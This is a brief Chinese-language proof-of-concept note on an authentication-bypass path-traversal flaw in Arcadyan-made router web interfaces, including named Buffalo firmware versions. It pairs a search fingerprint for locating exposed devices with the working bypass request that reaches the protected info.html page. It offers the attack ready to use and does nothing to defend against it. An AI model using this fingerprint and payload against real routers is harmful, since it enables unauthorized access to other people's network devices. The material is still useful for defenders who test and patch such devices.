Arcadyan 制造的网络设备的 Web 界面中存在路径遍历漏洞,包括 Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24,可能允许未经身份验证的远程攻击者绕过身份验证。
Untitled
app="Arcadyan-httpd-1.0"
登录页面
通过目录遍历访问主页面 info.html
/images/..%2finfo.html
